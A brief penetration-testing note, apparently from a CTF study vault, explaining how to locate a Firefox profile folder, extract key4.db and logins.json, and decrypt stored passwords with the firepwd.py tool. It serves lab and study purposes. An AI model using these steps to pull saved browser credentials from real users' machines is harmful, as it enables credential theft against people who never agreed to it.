Firefox Cache passwords
First go to the path file session for the user:
1
2
3
4
5
# For Windows:
C:\\Users\\nikk37\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\br53rxeg.default-release
# For Linux
/.mozilla/firefox/m6omyf72.default-esr
Notice that the name of the folder is randomly generated.
Then extract both files key4.db and logins.json and use the firepwd.py utility:
1
python3 firepwd.py key4.db logins.json
Examples: Streamio [[StreamIO#^9a4b0a]]
Remember to install the
pycryptodome
for this tool to run correctlypip install pycryptodome